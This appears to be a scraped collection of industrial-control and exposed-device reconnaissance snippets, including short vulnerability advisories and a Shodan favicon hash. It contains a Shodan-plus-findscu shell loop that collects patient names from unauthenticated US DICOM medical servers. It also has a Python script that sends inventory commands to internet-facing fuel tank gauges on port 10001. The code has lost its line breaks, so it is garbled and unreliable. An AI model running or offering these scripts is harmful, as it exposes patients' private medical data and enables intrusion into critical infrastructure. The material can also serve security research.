Enumerates Siemens S7 PLC Devices and collects their device information. This script is based off PLCScan that was developed by Positive Research and Scadastrangelove (https://code.google.com/p/plcscan/). This script is meant to provide the same functionality as PLCScan inside of Nmap. Some of the information that is collected by PLCScan was not ported over; this information can be parsed out of the packets that are received.
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
http.favicon.hash:-1250474341
Exposed DICOM Servers
Count patient names in US exposed DICOM medical servers with no authentication
$ shodan download search "tag:medical" "country:us"; shodan parse --fields ip_str search.json.gz > usa_dicom_ip ; for i in `cat usa_dicom_ip` ; do echo "///// Now connecting to $i ////" ; findscu -v -to 1 -P -k PatientName="*" $i 104 >> us_dicom_patient_names; wc -l us_dicom_patient_names ; done
Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.
Python script to search for common ICS file extensions
# Author: selmuximport osics_path =r'/path/to/dir/'# change pathics_ext = ('.rtu','.rdb','.ctz','.exp','.hprb','.selaprj','.xml','.bkp','.ssnet','.ncz','.prj','.rcd','.SYS_BASCOM.COM','.pcmp','.pcmi','.pcmt','.spj','.plz','.spj.prev','.adb','.opt','.out','.prp','.scl','.icd','.ied','.cid','.scd','.ssd','.ctz','.ap12','.ap13','.ap14','.ap15','.ap16','.ap17','.zap12','.zap13','.zap14','.zap15','.zap16','.zap17','.conf','.gz','.zip','.urs','.tcw','.hmb','.m6b','.sim','.syl','.cfg','.pt2','.l5x','.txt','.pl','.paf','.ini','.cin','.xrf','.v','.trc','.s5d','.s7p','.mwp','.s7f','.arj','.ekb','.license','.lic','.vstax','.cv4','.dtq','.pc5','.l5x','.eas','.l5k','.apa','.lic','.gsd','.gsg','.gse','.gsf','.gsi','.gsp','.gss')for root, dirs, files in os.walk(ics_path):for file in files:if file.endswith(ics_ext):print(os.path.join(root, file))
Automated Tank Gauge (ATG) Remote Configuration Disclosure:
In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 gas station Automated Tank Gauges (ATGs) which were publicly accessible. Besides monitoring for leakage, these systems are also instrumental in gauging fluid levels, tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are utilized by nearly every fueling station in the United States and tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators will commonly configure the ATG serial interface to an internet-facing TCP port (generally set to TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.
#!/usr/bin/env python3import timeimport socket withopen("/tmp/ATG_SCAN.txt",'r')as atg_file:for line in atg_file.read().splitlines():try: atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port =10001 search_str ='IN-TANK INVENTORY' msg =str('\x01'+'I20100'+'\n').encode('ascii') atg_socket.connect((line, port)) atg_socket.send(msg) time.sleep(.25) response = atg_socket.recv(1024).decode()if search_str in response:withopen("/tmp/ATG_DEVICES.txt", 'a')as file2: file2.write(line +"\t ->\tATG Device\n")else:continue atg_socket.close()except:passatg_file.close()
